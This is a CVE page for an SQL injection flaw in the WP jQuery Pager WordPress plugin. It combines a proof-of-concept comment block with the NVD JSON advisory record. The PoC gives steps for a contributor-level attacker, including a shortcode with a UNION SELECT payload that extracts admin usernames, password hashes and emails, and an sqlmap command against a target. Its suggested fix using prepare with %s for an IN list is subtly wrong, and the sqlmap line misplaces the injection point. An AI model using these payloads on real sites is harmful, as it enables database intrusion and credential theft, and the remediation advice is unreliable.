CVE-2025-10575

<!-- CVE-2025-10575 PoC - SQL Injection in WP jQuery Pager Plugin Vulnerable Parameter: ids (shortcode attribute) Affected Function: WPJqueryPaged::get_gallery_page_imgs() Affected Versions: <= 1.4.0 Required Privilege: Contributor or above --> // Step 1: Log in to WordPress as a Contributor-level user // Step 2: Create a new post or page // Step 3: Insert the following malicious shortcode in the content: [wp_jquery_pager ids="1 UNION SELECT user_login,user_pass,user_email,1,1,1,1,1,1,1,1,1 FROM wp_users WHERE ID=1--" limit="10"] // Step 4: Publish or preview the post/page // Step 5: The injected SQL query will execute, extracting admin credentials // from the wp_users table and displaying them in the gallery output // Alternative PoC using sqlmap (after identifying the injection point): // sqlmap -u "http://target.com/?page_id=X&ids=1*" --cookie="wordpress_logged_in_xxx=xxx" --dbs // The vulnerability exists because the plugin directly concatenates // the 'ids' parameter into SQL queries without using prepared statements: // $query = "SELECT * FROM {$wpdb->posts} WHERE ID IN ({$ids})"; // Instead of using: // $wpdb->prepare("SELECT * FROM {$wpdb->posts} WHERE ID IN (%s)", $ids);

{"cve": {"id": "CVE-2025-10575", "sourceIdentifier": "[email protected]", "published": "2025-10-15T09:15:40.740", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WP jQuery Pager plugin for WordPress is vulnerable to SQL Injection via the 'ids' shortcode attribute parameter handled by the WPJqueryPaged::get_gallery_page_imgs() function in all versions up to, and including, 1.4.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wp-jquery-pdf-paged/trunk/wp-jquery-paged.php#L80", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3a70b64b-a0e8-4b5c-af05-cf8f1d611dec?source=cve", "source": "[email protected]"}]}}